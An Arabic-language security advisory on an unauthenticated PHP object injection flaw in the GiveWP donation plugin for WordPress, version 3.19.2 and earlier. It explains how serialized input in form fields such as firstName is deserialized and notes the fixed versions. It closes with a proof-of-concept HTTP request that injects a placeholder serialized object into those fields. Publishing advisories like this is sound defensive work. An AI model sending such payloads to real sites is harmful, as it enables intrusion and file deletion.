
GiveWP – إضافة التبرعات ومنصة جمع التبرعات <= 3.19.2 - حقن كائنات PHP دون مصادقة
GiveWP – إضافة التبرعات ومنصة جمع التبرعات <= 3.19.2 - حقن كائن PHP بدون مصادقة
البرنامج الإضافي GiveWP – إضافة التبرعات ومنصة جمع التبرعات لـ WordPress عرضة لحقن كائن PHP في جميع الإصدارات حتى الإصدار 3.19.2 وما يشمل ذلك، عبر إلغاء تسلسل مدخلات غير موثوقة من نموذج التبرع مثل firstName. وهذا يتيح للمهاجمين غير المصادق عليهم حقن كائن PHP. كما أن وجود سلسلة POP إضافية يتيح للمهاجمين حذف ملفات عشوائية على الخادم، مما يجعل تنفيذ التعليمات البرمجية عن بُعد ممكنًا. يُرجى ملاحظة أنه تم إصلاح هذا جزئيًا فقط في الإصدار 3.19.3، ولم يتم إصدار إصلاح كافٍ تمامًا حتى الإصدار 3.19.4. ومع ذلك، تم تخصيص CVE آخر من قبل CNA آخر للإصدار 3.19.3، لذا سنعتبر هذا يؤثر على الإصدار 3.19.2 وما قبله. لقد أوصينا البائع باستخدام ترميز JSON لمنع ظهور أي ثغرات إلغاء تسلسل إضافية.
POST /?givewp-route=donate&givewp-route-signature=[SIGNATURE]&givewp-route-signature-id=givewp-donate&givewp-route-signature-expiration=[EXPIRY] HTTP/1.1
Host: kubernetes.docker.internal:8929
Content-Type: application/x-www-form-urlencoded
Content-Length: 163
amount=10¤cy=USD&gatewayId=manual&formId=90&company=O:20:"PHP_Object_Injection":0:{}&firstName=O:20:"PHP_Object_Injection":0:{}&[email protected]&donationType=single&donationBirthday=